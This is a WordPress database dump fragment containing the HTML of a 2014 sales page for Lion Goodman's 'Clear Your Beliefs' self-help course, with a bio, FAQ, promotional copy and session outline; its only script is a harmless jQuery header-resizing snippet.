class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:49:40', '2014-06-19 06:49:40', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1044, 2, '2014-06-19 01:54:37', '2014-06-19 06:54:37', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs 